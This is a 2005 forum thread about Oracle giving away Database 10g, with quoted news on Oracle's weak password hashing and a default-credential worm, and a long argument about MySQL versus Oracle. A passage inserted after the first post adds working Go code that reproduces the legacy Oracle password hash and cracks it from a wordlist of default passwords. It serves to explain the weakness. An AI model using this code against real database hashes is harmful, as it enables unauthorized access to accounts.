Oracle Database 10g given away for free

Discussion in 'NZ Computing' started by, Nov 3, 2005.

  1., Nov 3, 2005
    Shane Guest

This was published on the 28th of last month:
    A research paper released this week spells out weaknesses in the password mechanism
    for Oracle databases and describes how to break system passwords in

A number of decisions made by the database maker weaken the password
algorithm, according to Joshua Wright of the SANS Institute and Carlos Cid
of the University of London. Passwords in Oracle databases use the account
name to randomize the password hashing process, convert all characters to
uppercase letters and use a fairly weak hashing algorithm, the two
researchers said in the paper.

    and this is the pdf detailing the above vulnerability

    this was published 02/11 (presumably this morning our time)
    An Oracle worm posted to the Full-disclosure mailing list on Monday may be
    harmless now, but with the source code available it may not stay that way.

    The worm scans local subnets looking for other database servers, and then tries
    various common username and password combinations. If this succeeds, a
    table 'x' is placed on the server and the cycle is repeated. With the
    source code in the wild, it is trivial to change this table creation to
    something less benign.

    Oracle has been criticized in the past for its lax response to security
    issues, and given the company’s prior slogan of being "Unbreakable" this
    worm shows the importance of acting swiftly on vulnerabilities, before
    they become widespread problems.

    The source code to the worm can be found here

    Shane, Nov 3, 2005
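The two items Shane quotes above (the weak per-user "salt" plus case folding in the Oracle password hash, and a worm that simply tries common username/password pairs) are easiest to see side by side in code. The following is an added example written for this page; it is not code from any post in the thread, from Wright and Cid, or from Oracle. It implements the pre-11g Oracle hash as the 2005 paper documents it: username and password concatenated and upper-cased, each character widened to two bytes, zero-padded, DES-CBC under the fixed key 0x0123456789ABCDEF with a zero IV, the last ciphertext block re-used as a second key, and the last block of the second encryption stored as hex. The fixed key and the SCOTT/TIGER and SYSTEM/MANAGER test vectors are from the published description of the algorithm, not from this thread; the wordlist in `main` is constructed for the demo.

```go
package main

import (
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// fixedKey is the hard-coded first-round DES key documented for the
// Oracle 7 to 10g password hash (Wright & Cid, 2005). Not a secret.
var fixedKey = []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF}

// lastCBCBlock DES-CBC-encrypts data (already a multiple of 8 bytes) under
// key with an all-zero IV and returns only the final ciphertext block.
func lastCBCBlock(key, data []byte) ([]byte, error) {
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv := make([]byte, des.BlockSize) // the scheme fixes the IV at zero
	out := make([]byte, len(data))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, data)
	return out[len(out)-des.BlockSize:], nil
}

// OracleLegacyHash reproduces the stored pre-11g hash for a user/password:
//  1. USERNAME||PASSWORD, upper-cased (the username is the only "salt",
//     and the case of the password is thrown away);
//  2. each character widened to two bytes, high byte first (ASCII -> 0x00,ch);
//  3. zero-padded to a multiple of the DES block size;
//  4. DES-CBC under fixedKey, zero IV; the last block becomes key 2;
//  5. DES-CBC under key 2, zero IV; the last block, hex-encoded, is the hash.
// Assumes BMP characters only, which covers the ASCII accounts shown here.
func OracleLegacyHash(username, password string) (string, error) {
	s := strings.ToUpper(username + password)
	buf := make([]byte, 0, 2*len(s)+des.BlockSize)
	for _, r := range s {
		buf = append(buf, byte(r>>8), byte(r))
	}
	for len(buf)%des.BlockSize != 0 {
		buf = append(buf, 0)
	}
	key2, err := lastCBCBlock(fixedKey, buf)
	if err != nil {
		return "", err
	}
	h, err := lastCBCBlock(key2, buf)
	if err != nil {
		return "", err
	}
	return strings.ToUpper(hex.EncodeToString(h)), nil
}

// CrackWithWordlist is why the "salt" buys little: the username is public,
// case is folded, and a guess costs two DES passes. It returns the guess
// that reproduces storedHash, or "" if none in the list does.
func CrackWithWordlist(username, storedHash string, words []string) (string, error) {
	want := strings.ToUpper(storedHash)
	for _, w := range words {
		h, err := OracleLegacyHash(username, w)
		if err != nil {
			return "", err
		}
		if h == want {
			return w, nil
		}
	}
	return "", nil
}

func main() {
	// The well-known SCOTT/TIGER default account.
	h, _ := OracleLegacyHash("SCOTT", "TIGER")
	fmt.Println("SCOTT/TIGER ->", h) // F894844C34402B67
	// Case folding: scott/tiger hashes identically to SCOTT/TIGER.
	h2, _ := OracleLegacyHash("scott", "tiger")
	fmt.Println("scott/tiger ->", h2)
	// A constructed list of common default passwords, the kind of guessing
	// the worm on this page performs against each listener it finds.
	found, _ := CrackWithWordlist("SCOTT", h, []string{"manager", "change_on_install", "tiger"})
	fmt.Println("recovered:", found)
}
```

The point for a DBA is not the DES step but the two design choices before it: a public, user-derived salt means one precomputed table per account name serves every database in the world that has that account, and case folding shrinks the space the wordlist has to cover. Default accounts with default passwords, which is all the worm relies on, fall in milliseconds either way.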
  3. Interesting, but I'm not sure how this relates to Oracle giving away its
    software for free?
, Nov 3, 2005

    thingy Guest

    Not sure if it is brilliant or desperate.... Oracle bought some software
    "critical" to MySQL, which is generally seen as a move to curtail
    MySQL's growing market share.

    GPL (or similar licence) databases are MS and Linux; the
    next battleground becomes the applications on top of the OS. Databases
    are expensive and are a prime candidate for the "good enough" market.

    Oracle charges silly amounts for its software, something like $40k per
    cpu, ditto MS's SQL.

    MySQL on the other hand and a few others are free or just about free, and
    you can buy support if needed, and will do 50%+ of what most databases
    are used for.

    It will be interesting to watch........


    thingy, Nov 3, 2005

    Not Dave Guest

    LOL!!! That's really funny!!!

    Mentioning MySQL and Oracle in the same breath shows a complete lack
    of understanding of database technology.
    Not Dave, Nov 3, 2005

    Not Dave Guest

    Shane understands that commercial companies giving away solid,
    commercial software renders open source irrelevant, and are therefore
    a threat.

    Those that are not prepared to pay for quality commercial software no
    longer have to turn to the products made by hobbyists in their spare

    Well done Oracle, I say.
    Not Dave, Nov 3, 2005

    Chris Hope Guest

    You think MySQL is made by hobbyists? Sure, it may not be in the same
    league as Oracle, but it's a commercial company who pays their
    developers to develop their open source database products.

    It is quite interesting that Oracle is doing this though. However, you
    can only use the free version on smaller databases (4GB of user data in
    total) but still very interesting.
    Chris Hope, Nov 3, 2005

    Not Dave Guest

    I wasn't talking about MySQL specifically in that comment, although
    re-reading it I can see how it could be interpreted that way with my
    comment elsewhere regarding comparing mySQL and Oracle, which is a bit
    of a joke. I was more commenting in general - some posters here appear
    to be very against commercial software being free, as it erodes what
    they see as the competitive advantage of open source software - ie
    that it is free (as in beer).

    MySQL is a great, fast, lite little DBMS. Better yet, it's free in
    many situations. Oracle is the holy grail high-end enterprise-level
    and above DBMS. Both are good, and both definitely have their place.
    However, there is no place for comparisons between the two.
    A very interesting move. I wonder if Microsoft will make Access free
    in response? Which, of course, is about what it's worth, but that's a
    different thread... ;-)
    Not Dave, Nov 3, 2005

    Shane Guest

    I _think_ that the very same day that Oracle announced their software
    giveaway is the day Oracle made it to SecurityFocus' front page, because
    someone (in their omnipotent wisdom) has released source code for a
    working worm.
    As can _clearly_ be seen from the articles I quoted, all that is
    required for the worm to become malicious is to change the payload, so
    instead of making table x, shellcode (for example) is inserted.

    The _smart_ thing to do is to wait a few days for Oracle to respond to the
    flaws reported, and to patch them accordingly, or declare the 10g
    And _then_ download the products (saving a possible double-up)

    I do like how you turn a "heads up" into something personal though, HOG. I
    have to say it really does show the strength (or lack thereof) of your
    Is this because you're a complete moron?

    You really have to wonder about some people
    Shane, Nov 3, 2005

    Shane Guest

    I think the implications speak for themselves, wait a week or two to see
    if the free products are affected ... then download
    Shane, Nov 3, 2005
  11. Well I don't really care. They will patch this eventually I would suppose.
    Just like microsoft.

    Surely if your machine is firewalled and you are only using this within the
    'intranet' then there is no problem right?
, Nov 3, 2005

    Not Dave Guest

    It is simply a worm that "scans for common username/password
    combinations". That's not a vulnerability, that's a slack DBA.
    No, you posted those links in an attempt to discredit Oracle. Nice
    attempt at a backtrack, though.
    That's not the first time you've called me "HOG". Google Groups just
    told me WTF you are on about, and I see that a while ago another
    poster by the name of "HOG" also disagreed with you. I guess in your
    black and white world that makes us the same person. Quite comical,
    actually, and kind of proves my point.

    For the record, however, I am not "HOG".
    Hmm, personal abuse. Why don't you show the strength (or lack thereof)
    of my argument(s) by actually addressing them for a change, rather
    than resorting to your usual abuse?
    That you do.
    Not Dave, Nov 3, 2005
  13. He he if you want to run 500 million dollars in annual sales through MySQL
    then go for it.
, Nov 3, 2005

    Shane Guest

    Did you perchance see the *other* vulnerability?
    Yes, the one where the system user's password is considered *extremely*
    I beg your pardon, I posted those links as a heads up; nice try at putting
    words into my mouth... again.
    Funny how you present your arguments *precisely* as he did.
    er.. you're saying you weren't engaging in personal abuse.. nice retraction.

    Shall I actually address them by calling people commies?
    Or should I go quiet when asked to back up my comments?
    Shane, Nov 3, 2005

    Not Dave Guest

    Whatever. Someone said "Look, Oracle's giving something away for
    free". You, probably not even knowing who Oracle are, replied with
    "Yea, but look!! Vulnerabilities!!". [Verbatim].
    Sounds like an intelligent fellow.
    Really, though, Shane, you are inconsequential. If you want to call me
    hog, go right ahead. All it does is make you look like an idiot, since
    I'm obviously not him.
    I stated an opinion. Rather than addressing and debating that opinion,
    *you* resorted to abuse. As usual.
    Yes, you are right. I get bored sometimes trying to discuss things
    with idiots and trolls who don't understand that people can have
    opposing views, and sometimes just walk away.

    Prime example:

    This at the end of a thread when I have responded to posts you have
    made that have really illustrated your black and white mind set by
    pointing it out to you, only to be told to spend _my_ time coming up
    with these examples - that I have directly pointed out each time!! And
    in the same post you ask why I haven't given up in frustration and
    walked away! And now you're making comments on the fact I did just
    that!!!! Get with the programme, boy.

    Bye, now.
    Not Dave, Nov 3, 2005

    Shane Guest

    Ooo look, snipped away the other links, the ones where you can't show a
    single *instance* of your claims.

    Ah look, I posted factual goings-on related directly to the OP, to which
    *you* respond

    How is this _not_ a personal attack? How is this even remotely rebutting
    my post? How is this intelligent?
    In fact, this shows you *think* everything is an attack on your precious
    *commercial companies*.
    You really have to grow up, boy. This is the big bad world, mum's not here
    to look after you, and when there's an alert posted on SecurityFocus the
    very same day Oracle releases a product, the _smart_ people wait for it
    to be a) patched, or b) declared unaffected.
    PS: who funds SecurityFocus?.. Symantec ring any bells?.. nah, can't be..
    they're a commercial organisation.

    Here's the funny thing: only 4 days ago I was posting about phpBB being a
    security nightmare.
    Gosh.. does that mean I'm anti-OSS??????

    You're pathetic, "Not Dave", and your little war is doing nothing.
    In fact.. here's the best way to see the end of it:
    Shane, Nov 3, 2005

    Steven H Guest

    Hello Not,
    MSDE (much better than Access) is free and IMSVHO better than that primitive
    version of MySQL that I played with, although I would say that - having sold
    my soul to Microsoft and all that ...

    The only good thing about MySQL is it's shit-easy to install: copy the executable.
    MSDE (cut-up version of SQL Server) involves an installer.
    now now.. be nice..

    I have seen some highly polished programs done in Access; of course the first
    thing I said when I saw them was 'will I be converting this to .NET?', but
    that is beside the point.

    To those interested, the answer to my question was 'definitely no'.
    Steven H, Nov 3, 2005

    Shane Guest

    Yeah eventually.. with something like this you'd hope sooner rather than

    The 'ideal' testing situation would have to be a standalone machine,
    with no network connections, the next step up would be a machine behind
    another machine acting as a firewall, and limiting outbound as well as

    Definitely for testing purposes have a good look at it, just keep in mind
    all the 'gotchas' should you like it and want to take it to production
    Shane, Nov 3, 2005

    Not Dave Guest

    Not Dave, Nov 3, 2005

    Not Dave Guest

    True, actually.
    Actually, the best thing about MySQL is that it's a very lite and fast
    DBMS designed to work on pretty average hardware. It lacks anything
    resembling an "advanced" function, but is perfect for web stuff (small
    to medium sites).

    Obviously it's nowhere near the same league as Oracle, or even MSSQL.
    See, I don't think Access is a suitable basis for commercial software,
    and hence I have a hard time giving a good rating to software
    utilising it. Just my opinion, of course, but it is somewhat, um,
    Not Dave, Nov 3, 2005
